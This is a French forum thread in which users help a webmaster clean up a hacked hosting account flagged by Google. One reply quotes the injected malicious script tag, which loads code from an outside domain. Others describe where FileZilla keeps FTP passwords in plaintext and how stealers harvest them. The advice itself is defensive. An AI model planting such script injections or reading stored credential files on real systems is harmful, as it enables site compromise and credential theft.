Site hacker
Résolu/Fermé
Utilisateur anonyme
-
Modifié par bg62 le 7/10/2014 à 16:51
Utilisateur anonyme - 13 oct. 2014 à 09:30
Utilisateur anonyme - 13 oct. 2014 à 09:30
A voir également:
- Sitehacker
- Site de telechargement - Guide
- Site inaccessible - Guide
- Site de vente entre particulier - Guide
- Site partage photo - Guide
- Darkino site - Guide
7 réponses
bg62
Messages postés
23590
Date d'inscription
samedi 22 octobre 2005
Statut
Modérateur
Dernière intervention
15 avril 2024
2 362
7 oct. 2014 à 15:21
7 oct. 2014 à 15:21
lut;)
j'ai eu le même genre de soucis ....
https://forums.commentcamarche.net/forum/affich-29833003-redirection-vers-http-127-0-0-1
si cela peut te servir,
sinon il me faudrait l'url des 3 sites concernés ( même en MP si tu veux )
et surtout savoir si :
- tu as une sauvegarde complète
- si ton pc est 'clean' de chez clean ...
@+
j'ai eu le même genre de soucis ....
https://forums.commentcamarche.net/forum/affich-29833003-redirection-vers-http-127-0-0-1
si cela peut te servir,
sinon il me faudrait l'url des 3 sites concernés ( même en MP si tu veux )
et surtout savoir si :
- tu as une sauvegarde complète
- si ton pc est 'clean' de chez clean ...
@+
animostab
Messages postés
2829
Date d'inscription
jeudi 10 mars 2005
Statut
Membre
Dernière intervention
11 novembre 2019
738
Modifié par animostab le 9/10/2014 à 00:57
Modifié par animostab le 9/10/2014 à 00:57
Au lieu de filezilla utilise l'extention fireFTP pour firefox : les MP stockés sont cryptés
Si tu rajoute un MP principal à firefox il est normalement impossible à un stealer d'acceder à la base des MP dans signon.sqlite pour dé-hasher les MP avec la clé d'encryption stockée dans firefox.
Le mot de passe principal firefox se met par dessus la base des MP et lui n'est pas stocké donc non récupérable.
et surtout nettoyer le pc infecté par rootkit, virer filezilla (totalement car les MP ne sont pas stockés dans programfiles / filezilla mais dans C/ documents and setting / nom du user / application data / filezilla / sitemanager.xml). Le dossier filezilla dans application data doit être supprimé manuellement !
Si tu rajoute un MP principal à firefox il est normalement impossible à un stealer d'acceder à la base des MP dans signon.sqlite pour dé-hasher les MP avec la clé d'encryption stockée dans firefox.
Le mot de passe principal firefox se met par dessus la base des MP et lui n'est pas stocké donc non récupérable.
et surtout nettoyer le pc infecté par rootkit, virer filezilla (totalement car les MP ne sont pas stockés dans programfiles / filezilla mais dans C/ documents and setting / nom du user / application data / filezilla / sitemanager.xml). Le dossier filezilla dans application data doit être supprimé manuellement !
codeurh24
Messages postés
761
Date d'inscription
samedi 29 mars 2014
Statut
Membre
Dernière intervention
8 septembre 2018
123
9 oct. 2014 à 04:53
9 oct. 2014 à 04:53
Bien vue animostab tu viens de me faire ouvrir les yeux c'est hallucinant !
chez moi c'est C:\Users\codeurH24\AppData\Roaming\FileZilla\sitemanager.xml
Le pire pour moi c'est que ça ne met pas en danger que moi mais aussi les gens qui me confisent leurs hébergements web dont parfois quelques sociétés.
je vais remédier a ça.
chez moi c'est C:\Users\codeurH24\AppData\Roaming\FileZilla\sitemanager.xml
Le pire pour moi c'est que ça ne met pas en danger que moi mais aussi les gens qui me confisent leurs hébergements web dont parfois quelques sociétés.
je vais remédier a ça.
animostab
Messages postés
2829
Date d'inscription
jeudi 10 mars 2005
Statut
Membre
Dernière intervention
11 novembre 2019
738
9 oct. 2014 à 14:02
9 oct. 2014 à 14:02
les mp notepad++ sont dans un fichier nommé
NppFTP.xml (faire rechercher fichier)
voir si les MP sont en clair ou crytpés
apparemment les version 0.2.3.0 and 0.2.4.0 de NppFTP sont vulnérables et permettent un remote acces dans le système d'exploitation
Pour la dernière version 0.25 je n'en sais rien
NppFTP.xml (faire rechercher fichier)
voir si les MP sont en clair ou crytpés
apparemment les version 0.2.3.0 and 0.2.4.0 de NppFTP sont vulnérables et permettent un remote acces dans le système d'exploitation
Pour la dernière version 0.25 je n'en sais rien
codeurh24
Messages postés
761
Date d'inscription
samedi 29 mars 2014
Statut
Membre
Dernière intervention
8 septembre 2018
123
9 oct. 2014 à 17:32
9 oct. 2014 à 17:32
Il y a bien un fichier qui enregistre en clair les informations sauf que les mots de passe sont cryptés. Le problème c'est que les algorithmes qui encryptent et décryptent sont publiés sur internet en c++ mais je n'ai pas trouvé de site proposant un logiciel pour décrypter.
animostab
Messages postés
2829
Date d'inscription
jeudi 10 mars 2005
Statut
Membre
Dernière intervention
11 novembre 2019
738
9 oct. 2014 à 18:24
9 oct. 2014 à 18:24
Donc on peut dire que basiquement c'est sécurisé. je pense pas que des stealer vont se prendre la tete a faire un prog de vol de MP dans un truc aussi peu utilisé de notepad++
il préfèrent les machines de noobs
mais bon ...
il préfèrent les machines de noobs
mais bon ...
animostab
Messages postés
2829
Date d'inscription
jeudi 10 mars 2005
Statut
Membre
Dernière intervention
11 novembre 2019
738
7 oct. 2014 à 15:05
7 oct. 2014 à 15:05
Bien que je n'ai pas tout compris voici ce que j'en pense
si le fichier infecté est aussi sur un local ---> virus ou exploit
y a t il filezilla avec les MP enregistré ?
certains exploit avec filezilla rajoutent la ligne javascript sur l'index et autres, envoient sur le serveur distant et récupèrent en passant les MP login ftp tout ca en moins d'une seconde!
si le fichier infecté uniquement sur le serveur distant --> MP login FTP hacké soit directement chez l'hebergeur soit sur le pc local
ces conneries d'exploit servent a propager l'infection par le biais d'exploit + infecter les machines (pups botnets trojans etc ...)
si le fichier infecté est aussi sur un local ---> virus ou exploit
y a t il filezilla avec les MP enregistré ?
certains exploit avec filezilla rajoutent la ligne javascript sur l'index et autres, envoient sur le serveur distant et récupèrent en passant les MP login ftp tout ca en moins d'une seconde!
si le fichier infecté uniquement sur le serveur distant --> MP login FTP hacké soit directement chez l'hebergeur soit sur le pc local
ces conneries d'exploit servent a propager l'infection par le biais d'exploit + infecter les machines (pups botnets trojans etc ...)
salut,
désolé de pas avoir répondut avant,
merci de répondre...
filezilla avec les MP enregistré
oui moi (2 pc mon portable que mon beau pere uttilise souvent, et le miens oui sur)+ le pce de mon beau pere qui est infecté depuis les derniere nouvelles.... (ROOTKIT), ja i tout reussit a enlever sauf le rootkit.
pour moi ton explication coïncide, nous on as pensé à un hackeur.
je récise pour etre clair
un Hebregeur : qu heberge 3 sites...
1 le mien
2 l amis webmaster abvec son site
3 le beau pere avec son site
éventuellement co sur le ftp y a 4 pc le mien, mon portable, le pc du beau pere et celui de l'amis.
3 sont clean sur et certain...
1 non
j'en suis la...
désolé de pas avoir répondut avant,
merci de répondre...
filezilla avec les MP enregistré
oui moi (2 pc mon portable que mon beau pere uttilise souvent, et le miens oui sur)+ le pce de mon beau pere qui est infecté depuis les derniere nouvelles.... (ROOTKIT), ja i tout reussit a enlever sauf le rootkit.
pour moi ton explication coïncide, nous on as pensé à un hackeur.
je récise pour etre clair
un Hebregeur : qu heberge 3 sites...
1 le mien
2 l amis webmaster abvec son site
3 le beau pere avec son site
éventuellement co sur le ftp y a 4 pc le mien, mon portable, le pc du beau pere et celui de l'amis.
3 sont clean sur et certain...
1 non
j'en suis la...
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Utilisateur anonyme
Modifié par lionhell454 le 8/10/2014 à 06:37
Modifié par lionhell454 le 8/10/2014 à 06:37
Donc le résume la je suis en train de voir pour le rootkit...
puis j ai changer le mot de passe ftp est recréer 4 compte ftp
1 par site et celui de l'arborescence générale
tous les code sont complexe genre Moncode579154
et DIFFÉRENT au cas ou le hacker passe pas le pc de mon beau pere ou par file zilla comme évoquer ce que je connais pas mais ont l'utilisent
Plusieurs problèmes font parfois une solution...
puis j ai changer le mot de passe ftp est recréer 4 compte ftp
1 par site et celui de l'arborescence générale
tous les code sont complexe genre Moncode579154
et DIFFÉRENT au cas ou le hacker passe pas le pc de mon beau pere ou par file zilla comme évoquer ce que je connais pas mais ont l'utilisent
Plusieurs problèmes font parfois une solution...
Utilisateur anonyme
9 oct. 2014 à 05:03
9 oct. 2014 à 05:03
Super je te remercie,
bon deja coté rootkit on à vérifier dans le forum sécurité et c'est bon les 4 pc utilisés sont propres.
ok on va faire ca,, deja on pensé supprimé filezilla mais c'est vrais que je savais pas pour les mots de passes stockés.
par contre on se sert aussi de notepad++ enfin du plug intégrer nommé NPPFTP.
tu pense qu'il assez est sécurisé, ou vaut mieux arrêter de l'utiliser ?
bon deja coté rootkit on à vérifier dans le forum sécurité et c'est bon les 4 pc utilisés sont propres.
ok on va faire ca,, deja on pensé supprimé filezilla mais c'est vrais que je savais pas pour les mots de passes stockés.
par contre on se sert aussi de notepad++ enfin du plug intégrer nommé NPPFTP.
tu pense qu'il assez est sécurisé, ou vaut mieux arrêter de l'utiliser ?
animostab
Messages postés
2829
Date d'inscription
jeudi 10 mars 2005
Statut
Membre
Dernière intervention
11 novembre 2019
738
10 oct. 2014 à 12:57
10 oct. 2014 à 12:57
Regarde le post de codeurh24 et ma réponse (plus haut) : c'est mitigé
On trouve sur le net l'algorithme qui permet de decoder encoder les MP dans NPPFTP mais c'est en C++ donc il faudrait le compiler avec en plus un prog qui fait le meme boulot que l'exploit de filezilla.
Donc NPPFTP (dernière version) stocke les MP en crypté. il n'existe pas de prog connu qui décrypte et recupère les MP pour faire un sale boulot mais c'est possible de le faire
FireFTP + firefox + mot de passe principal firefox = apparemment totalement sécurisé.
On trouve sur le net l'algorithme qui permet de decoder encoder les MP dans NPPFTP mais c'est en C++ donc il faudrait le compiler avec en plus un prog qui fait le meme boulot que l'exploit de filezilla.
Donc NPPFTP (dernière version) stocke les MP en crypté. il n'existe pas de prog connu qui décrypte et recupère les MP pour faire un sale boulot mais c'est possible de le faire
FireFTP + firefox + mot de passe principal firefox = apparemment totalement sécurisé.
bg62
Messages postés
23590
Date d'inscription
samedi 22 octobre 2005
Statut
Modérateur
Dernière intervention
15 avril 2024
2 362
10 oct. 2014 à 11:45
10 oct. 2014 à 11:45
re ;)
mais ^^pourquoi te casses-tu la t^te là dessus ???
juste quelques principes de base ( changement de mdp , vérification des PC, etc ...)
+ tout supprimer en ligne
+ tout remettre à partir d'une sauvegarde saine
+ demande à GG de lever cette sanction ...
as-tu au mois fait ou essayé cela ???
mais ^^pourquoi te casses-tu la t^te là dessus ???
juste quelques principes de base ( changement de mdp , vérification des PC, etc ...)
+ tout supprimer en ligne
+ tout remettre à partir d'une sauvegarde saine
+ demande à GG de lever cette sanction ...
as-tu au mois fait ou essayé cela ???
animostab
Messages postés
2829
Date d'inscription
jeudi 10 mars 2005
Statut
Membre
Dernière intervention
11 novembre 2019
738
Modifié par animostab le 10/10/2014 à 13:19
Modifié par animostab le 10/10/2014 à 13:19
Et en plus virer filezilla complètement comme expliqué plus haut car dans filezilla les MP sont stockés en clair sans aucun cryptage (rechercher sitemanager.xml sur la machine) donc totalement livré a toute personne ou programme ayant accès a ce fichier !!! merci filezilla !
bg62
Messages postés
23590
Date d'inscription
samedi 22 octobre 2005
Statut
Modérateur
Dernière intervention
15 avril 2024
2 362
10 oct. 2014 à 17:56
10 oct. 2014 à 17:56
mais toujours aucun changement sur le troisième lien !!!!
salut, dej adsl j'ai manqué de temps.
mais c'est bon des que on à changer les codes plus de fichiers modifier,
ont virent mozilla aussi par la même occasion. J'ai un pc sur 4 (celui de mon beau pere, le seul que j ai pas pu vérifier le soir meme) qui était infecté d'un virus risque élevé (meme plusieurs mais un processus actif.) maintenant c'est clean j'ai fait vérifier par un contributeur sécu les différents pc (que je remercie d'ailleurs Malekal morte).
bg62 coté sauvegarde aussi on est ok elles sont bonnes il me reste un truc a faire que j ai pas fait c'est supprimer le message erreur google mais je m en occupe sous peu je l'ais deja fait, meme si je me rappelle plus comment, ca doit pas etre sorcier.
virus ou pas on pense à la faille évoqué sur mozilla car le pc à pas était touché et le plus bizarre c'est que c'est le site le plus leger qui à était attaqué, alors que les autres ont du javascript des bases de données etc.... (le plus simple peut etre ou alors peut être du a l arborescence qui était pas la même, c'est a dire que nous ont est dans Public_html lui il est dans www au début je savait pas trop la différence que je sait toujours pas d'ailleurs^^... est ce peut etre pour cela que le pc du beau pere est en cause et que le hackeur n'ai pas pu remonté ou n'as pas vu toutes l'arborescence dans file zilla mais la je sait pas je cale...)
puis ca sert à rien ce qu'il a fait!
Je vous remercie à tous je passe en résolut.
mais c'est bon des que on à changer les codes plus de fichiers modifier,
ont virent mozilla aussi par la même occasion. J'ai un pc sur 4 (celui de mon beau pere, le seul que j ai pas pu vérifier le soir meme) qui était infecté d'un virus risque élevé (meme plusieurs mais un processus actif.) maintenant c'est clean j'ai fait vérifier par un contributeur sécu les différents pc (que je remercie d'ailleurs Malekal morte).
bg62 coté sauvegarde aussi on est ok elles sont bonnes il me reste un truc a faire que j ai pas fait c'est supprimer le message erreur google mais je m en occupe sous peu je l'ais deja fait, meme si je me rappelle plus comment, ca doit pas etre sorcier.
virus ou pas on pense à la faille évoqué sur mozilla car le pc à pas était touché et le plus bizarre c'est que c'est le site le plus leger qui à était attaqué, alors que les autres ont du javascript des bases de données etc.... (le plus simple peut etre ou alors peut être du a l arborescence qui était pas la même, c'est a dire que nous ont est dans Public_html lui il est dans www au début je savait pas trop la différence que je sait toujours pas d'ailleurs^^... est ce peut etre pour cela que le pc du beau pere est en cause et que le hackeur n'ai pas pu remonté ou n'as pas vu toutes l'arborescence dans file zilla mais la je sait pas je cale...)
puis ca sert à rien ce qu'il a fait!
Je vous remercie à tous je passe en résolut.
bg62
Messages postés
23590
Date d'inscription
samedi 22 octobre 2005
Statut
Modérateur
Dernière intervention
15 avril 2024
2 362
11 oct. 2014 à 11:54
11 oct. 2014 à 11:54
ben là tu as tout faux ...
"il me reste un truc a faire que j ai pas fait c'est supprimer le message erreur google mais je m en occupe sous peu je l'ais deja fait, meme si je me rappelle plus comment, ca doit pas etre sorcier. "
tant que GG n'a pas été sollicité pour une nouvelle vérification de ces sites / liens, la situation sera toujours la m^me :)
et pour le faire je t'ai déjà donné les liens ... :)
@+
ps : mis en résolu = pour moi, perso, NON !!! ton problème existe toujours ...
"il me reste un truc a faire que j ai pas fait c'est supprimer le message erreur google mais je m en occupe sous peu je l'ais deja fait, meme si je me rappelle plus comment, ca doit pas etre sorcier. "
tant que GG n'a pas été sollicité pour une nouvelle vérification de ces sites / liens, la situation sera toujours la m^me :)
et pour le faire je t'ai déjà donné les liens ... :)
@+
ps : mis en résolu = pour moi, perso, NON !!! ton problème existe toujours ...
animostab
Messages postés
2829
Date d'inscription
jeudi 10 mars 2005
Statut
Membre
Dernière intervention
11 novembre 2019
738
11 oct. 2014 à 15:07
11 oct. 2014 à 15:07
Si tu es inscrit dans google webmaster tools demande un réexamen du site
Modifié par bg62 le 7/10/2014 à 16:51
A essayer enlever la ligne <!--359e2d--><script type="text/javascript" src="http : / / www. beini .de/comments.php]"></script><!--/359e2d-->
uploader sur le distant / ouvrir la page avec javascript désactivé / regarder la code source si il n'y a plus la ligne javascript / si pas de ligne activer javascript regarder si ca redirige.
Modifié par bg62 le 7/10/2014 à 16:50
d'où la question ' sauvegarde ' ou pas ...
j'ai modifié les liens vers la redirection ...: page malveillante ;)
8 oct. 2014 à 06:24
https://forums.commentcamarche.net/forum/affich-30880898-site-hacker#2
deja merci bg62 je vais voir les liens.
les 3 site je vais les donnée ici je m en fou sont public seulement un est bloqué par google bertolkien.
Site 1
http://lionzone.fr/
Site 2
http://www.codeurh24.com/ qui est aussi heberger sur le meme serveur il a prix un autre nom de domaine a 0.90 centime d euro je crois lol... et il est héberger sur lionzone.fr
Site 3
http://www.bertolkien.lionzone.fr/
ATTENTION c'est apparemment le seul hacké.
et surtout savoir si :
- tu as une sauvegarde complète
- si ton pc est 'clean' de chez clean ...
sauvegarde oui chacun a la sienne.
PC clean SUR 4 3 OUI sur et certain l'autre je pensé que non c'est confirmé il etait infecté et rete un rootkit que je n'arrive pas a supprimé mais je vais poster ens écurité des que j ai le pc sous la main.
merci
8 oct. 2014 à 06:26
salut et merci je vais regarder ca de suite.
8 oct. 2014 à 06:41
Si le hackeur devais ce servir de mon pc, il aurais bcp de mal avec mon encodage qui dure 4jours et qui prend 99% de mes ressources.
J'exclus donc que le hackeur c'est servis de mon site ou de mon pc.